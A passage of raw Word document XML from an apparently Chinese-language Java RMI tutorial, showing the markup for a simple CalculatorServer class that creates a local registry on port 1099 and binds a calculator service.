          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AC366D" w14:textId="77777777" w:rsidR="000B4FF4" w:rsidRPr="00FA7AB5" w:rsidRDefault="000B4FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FAA2E33" w14:textId="6020E2A8" w:rsidR="000B4FF4" w:rsidRDefault="00793F7C" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00793F7C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来，创建服务器和客户端类：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF4BB07" w14:textId="544D07FC" w:rsidR="00284AA2" w:rsidRDefault="00DE1D6F" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7E02CC" w14:textId="77777777" w:rsidR="00DE1D6F" w:rsidRDefault="00DE1D6F" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.rmi.Naming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.rmi.registry.LocateRegistry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">public class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CalculatorServer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public static void </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="41A1C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[] args) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建远程对象实例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Calculator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">calculator = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CalculatorImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册表，并将远程对象绑定到指定的主机和端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LocateRegistry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>createRegistry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D0BF69"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1099</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Naming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rebind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"//localhost/CalculatorService"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, calculator);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"RMI Server started."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">catch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Exception </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">"RMI Server exception: " </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+ e.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            e.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>printStackTrace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
